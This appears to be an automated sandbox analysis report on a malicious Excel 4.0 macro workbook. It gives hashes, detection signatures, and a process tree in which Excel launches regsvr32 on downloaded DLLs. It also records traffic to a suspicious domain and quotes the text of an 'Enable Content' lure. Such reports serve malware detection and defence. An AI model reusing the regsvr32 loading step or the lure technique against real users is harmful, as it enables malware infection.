Loading ...

Play interactive tourEdit tour

Windows Analysis Report plan-515372324.xlsb

Overview

General Information

Sample Name:plan-515372324.xlsb
Analysis ID:442112
MD5:08e52afbefa423fb9f1ea0af88a4880e
SHA1:2d688dfee28f75553bc1d3633f891d2e70e0408b
SHA256:aaa32ff3e41c61fe828f0850e702f5ed7ffd6177c4bf80ed15324525537f44cd
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6272 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 6156 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
    • regsvr32.exe (PID: 6464 cmdline: regsvr32 ..\palpy1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6672 cmdline: regsvr32 ..\palpy2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\palpy1.dll, CommandLine: regsvr32 ..\palpy1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6272, ProcessCommandLine: regsvr32 ..\palpy1.dll, ProcessId: 6464

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: plan-515372324.xlsbVirustotal: Detection: 15%Perma Link
Source: plan-515372324.xlsbReversingLabs: Detection: 21%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknownHTTPS traffic detected: 103.28.39.29:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.121.13:443 -> 192.168.2.4:49741 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
Source: global trafficDNS query: name: khangland.pro
Source: global trafficTCP traffic: 192.168.2.4:49739 -> 103.28.39.29:443
Source: global trafficTCP traffic: 192.168.2.4:49739 -> 103.28.39.29:443
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: khangland.pro
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.aadrm.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.cortana.ai
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.diagnostics.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.office.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.onedrive.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://augloop.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://augloop.office.com/v2
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://cdn.entity.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://clients.config.office.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://config.edge.skype.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://cortana.ai
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://cortana.ai/api
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://cr.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://dev.cortana.ai
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://devnull.onenote.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://directory.services.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://enrichment.osi.office.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://graph.ppe.windows.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://graph.windows.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://graph.windows.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://lifecycle.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://login.microsoftonline.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://login.windows.local
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://management.azure.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://management.azure.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://messaging.office.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://ncus.contentsync.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://officeapps.live.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://onedrive.live.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://osi.office.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://outlook.office.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://outlook.office365.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://powerlift.acompli.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://settings.outlook.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://staging.cortana.ai
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://tasks.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://webshell.suite.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://wus2.contentsync.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 103.28.39.29:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.121.13:443 -> 192.168.2.4:49741 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable Content WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS or Android, please use Desktop
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: plan-515372324.xlsbInitial sample: Sheet size: 9243
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: classification engineClassification label: mal72.expl.evad.winXLSB@7/10@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{CB9944C5-26E1-485A-9CD8-E6A080068253} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: plan-515372324.xlsbVirustotal: Detection: 15%
Source: plan-515372324.xlsbReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\palpy1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\palpy2.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\palpy1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\palpy2.dll
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: plan-515372324.xlsbInitial sample: OLE zip file path = xl/media/image5.png
Source: plan-515372324.xlsbInitial sample: OLE zip file path = xl/media/image4.png
Source: plan-515372324.xlsbInitial sample: OLE zip file path = xl/media/image3.png
Source: plan-515372324.xlsbInitial sample: OLE zip file path = xl/media/image2.png
Source: plan-515372324.xlsbInitial sample: OLE zip file path = xl/media/image6.png
Source: plan-515372324.xlsbInitial sample: OLE zip file path = xl/media/image1.png
